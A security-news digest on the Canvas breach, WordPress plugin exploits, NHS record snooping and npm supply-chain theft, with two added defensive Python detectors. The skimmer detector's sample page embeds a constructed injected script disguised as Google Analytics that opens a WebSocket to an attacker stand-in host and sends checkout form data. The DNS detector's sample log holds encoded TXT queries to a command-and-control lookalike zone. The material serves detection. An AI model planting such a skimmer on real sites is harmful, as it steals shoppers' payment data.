Key developments
Canvas breach exposes 200 million users
Instructure said ShinyHunters accessed Canvas data through Free-For-Teachers accounts and a vulnerability in the free-tier support ticket system, putting information from more than 200 million users at risk. The company temporarily shut down Free-For-Teacher accounts while it investigated and said the attackers agreed to return or delete the stolen data.
Why it matters
The breach shows how free-tier and support workflows can become a high-scale privacy exposure.
Sources & driving stories
MARKETBRIEF · Scott Elliott
Marketbrief coverage

WordPress plugins expose checkout and site data
BleepingComputer reported active exploitation of a critical bug in the Funnel Builder WordPress plugin that lets unauthenticated attackers inject JavaScript into WooCommerce checkout pages. The injected payload is disguised as Google Tag Manager or Google Analytics code, opens a WebSocket connection to an external server, and can be used to steal customers' payment card data. In a separate disclosure, Wordfence said Avada Builder flaws in versions through 3.15.2 can expose files such as wp-config.php and, if WooCommerce was enabled and later deactivated, allow unauthenticated SQL injection; FunnelKit 3.15.0.3 and Avada 3.15.3 are the fixed versions.
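The skimmer described above hides inside a script that looks like a tag-manager or analytics snippet but opens a WebSocket to a third-party host. As an added example (not code from the BleepingComputer report, Wordfence, or either plugin), the following Python scan pulls every script out of a checkout page and flags inline scripts that carry analytics-looking text and open a WebSocket to a host other than the site itself. The sample HTML, the host names, and the function names are constructed for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page (not captured from any real site): one ordinary
# Google Tag Manager loader, followed by an injected script that claims to be
# "Google Analytics" but opens a WebSocket to an outside host.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script>
/* Google Tag Manager */
(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});})(window,document,'script','dataLayer','GTM-EXAMPLE');
</script>
<script>
// Google Analytics
var ws = new WebSocket("wss://analytics-cdn.example-attacker.invalid/ws");
ws.onopen = function(){ ws.send(checkoutFormData); };
</script>
</head><body>checkout form here</body></html>
"""

# A WebSocket constructor call with a literal ws:// or wss:// URL.
WS_RE = re.compile(r"""new\s+WebSocket\s*\(\s*['"](wss?://[^'"]+)['"]""", re.I)
# Text that a skimmer uses to pass as a legitimate analytics snippet.
ANALYTICS_MARKER_RE = re.compile(
    r"google\s*tag\s*manager|google\s*analytics|gtm\.js|googletagmanager", re.I)


class ScriptCollector(HTMLParser):
    """Collects (src attribute, inline body) for every <script> on the page."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self.in_script:
            # Script bodies may arrive in several chunks; join them.
            self.scripts.append((self._src, "".join(self._buf)))
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self._buf.append(data)


def find_suspicious_websockets(html, site_host, allowed_hosts=()):
    """Return one finding per WebSocket opened by an inline script to a host
    that is neither the site itself nor an explicitly allowed host.

    Each finding records the URL, the host, whether the same script also
    carries tag-manager/analytics wording (the disguise described in the
    report), and the script's src attribute (None for inline scripts).
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        for match in WS_RE.finditer(body):
            ws_url = match.group(1)
            host = (urlparse(ws_url).hostname or "").lower()
            if host == site_host.lower() or host in allowed_hosts:
                continue
            findings.append({
                "ws_url": ws_url,
                "host": host,
                "analytics_disguise": bool(ANALYTICS_MARKER_RE.search(body)),
                "script_src": src,
            })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_websockets(SAMPLE_CHECKOUT_HTML, "shop.example"):
        print(finding)
```

Run against the constructed page, the first script (a real-looking GTM loader with no socket) produces nothing, while the second is reported with analytics_disguise set. The check is deliberately conservative: genuine tag-manager code does not open WebSockets from the checkout page, so any such connection to an unexpected origin is worth a look regardless of what the comment above it says.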
Why it matters
WordPress sites remain exposed to both card skimming and credential theft through plugin bugs.
Sources & driving stories
BLEEPINGCOMPUTER · Bill Toulas
BleepingComputer coverage
BLEEPINGCOMPUTER · Bill Toulas
BleepingComputer coverage

NHS trust admits Southport records snooping
Aintree Hospital's parent trust, UHLG, admitted that 48 staff inappropriately accessed the medical records of Southport knife attack victims in the days after the July 2024 attack. The patients were told only this week, nearly two years later, after an internal audit and review; disciplinary actions ranged from informal counselling to a final written warning, and no staff were dismissed.
Why it matters
It underscores how internal access misuse and delayed notification can intensify privacy harm in healthcare.
Sources & driving stories
YAHOO
Yahoo coverage

Worth noting
WORTH NOTING
Edge stops loading cleartext passwords
Microsoft is changing Edge after a researcher showed saved passwords were decrypted and left in process memory at startup.
WORTH NOTING
node-ipc leaks secrets over DNS
The npm supply-chain compromise uses DNS TXT queries to exfiltrate environment variables and local files, making it a stealthy credential-theft campaign.
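DNS TXT exfiltration of the kind described above leaves a recognisable trace in resolver logs: a burst of TXT queries from one client to one zone, with long, high-entropy leading labels carrying the encoded data. As an added example (not code from the node-ipc project or from any published analysis of the campaign), the following Python script scores constructed resolver log lines with exactly those three properties. The log format, the client addresses, the zone name, and the encoded labels are all constructed; the approximation of the registrable zone as the last two labels is a simplification (a public suffix list would be used in practice).

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log lines, "timestamp client qtype qname" (not taken
# from any real system). Client 10.0.0.5 sends three TXT queries whose leading
# labels are long hex blobs under one zone; 10.0.0.7 sends ordinary TXT
# lookups (DMARC, SPF) that must not be flagged.
SAMPLE_DNS_LOG = """\
1712000001 10.0.0.5 A www.example.com
1712000002 10.0.0.5 TXT 0123456789abcdef0123456789abcdef.aaaaaabbbbbbcccc.c2-lookalike.invalid
1712000003 10.0.0.5 TXT fedcba9876543210fedcba9876543210.ddddddeeeeeeffff.c2-lookalike.invalid
1712000004 10.0.0.5 TXT 02468ace13579bdf02468ace13579bdf.gggggghhhhhhiiii.c2-lookalike.invalid
1712000005 10.0.0.7 TXT _dmarc.example.com
1712000006 10.0.0.7 TXT example.com
1712000007 10.0.0.9 A registry.npmjs.org
"""


def shannon_entropy(text):
    """Bits per character of the string; encoded payloads score high."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def parse_line(line):
    ts, client, qtype, qname = line.split()
    return {"ts": int(ts), "client": client,
            "qtype": qtype.upper(), "qname": qname.rstrip(".").lower()}


def split_zone(qname):
    """Split a name into (payload labels, zone), taking the last two labels
    as the zone. Simplification: a public suffix list handles co.uk etc."""
    labels = qname.split(".")
    if len(labels) <= 2:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def find_txt_exfil(log_text, min_queries=3, min_payload_len=30, min_entropy=3.0):
    """Return {(client, zone): [qnames]} for client/zone pairs that issued at
    least min_queries TXT queries whose subdomain part carries at least
    min_payload_len encoded characters with a high-entropy leading label."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["qtype"] != "TXT":
            continue
        payload, zone = split_zone(rec["qname"])
        if len(payload.replace(".", "")) < min_payload_len:
            continue  # short labels such as _dmarc are normal TXT traffic
        leading_label = payload.split(".")[0]
        if shannon_entropy(leading_label) < min_entropy:
            continue
        hits[(rec["client"], zone)].append(rec["qname"])
    return {key: names for key, names in hits.items() if len(names) >= min_queries}


if __name__ == "__main__":
    for (client, zone), names in find_txt_exfil(SAMPLE_DNS_LOG).items():
        print(f"{client} -> {zone}: {len(names)} suspicious TXT queries")
```

On the constructed log only the 10.0.0.5 to c2-lookalike.invalid pair is reported; the DMARC and bare-domain TXT lookups from 10.0.0.7 fall below the payload-length floor. The thresholds are starting points to be tuned against a baseline of the environment's own TXT traffic, and a hit is a lead for checking which process on the client issued the queries rather than a verdict on its own.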
WORTH NOTING
REMUS stealer shifts toward session theft
Flare's analysis shows the malware operator adding restore tokens, proxy support, and password-manager collection, signaling a move beyond simple password theft.
Still unclear
OPEN QUESTION
Which other free-tier support systems expose data?
The Canvas incident suggests SaaS vendors may have hidden exposure paths in support tooling and low-privilege account flows.
OPEN QUESTION
How fast can WordPress sites purge skimmers?
Active checkout-script injection means detection and removal speed now matter as much as patching.
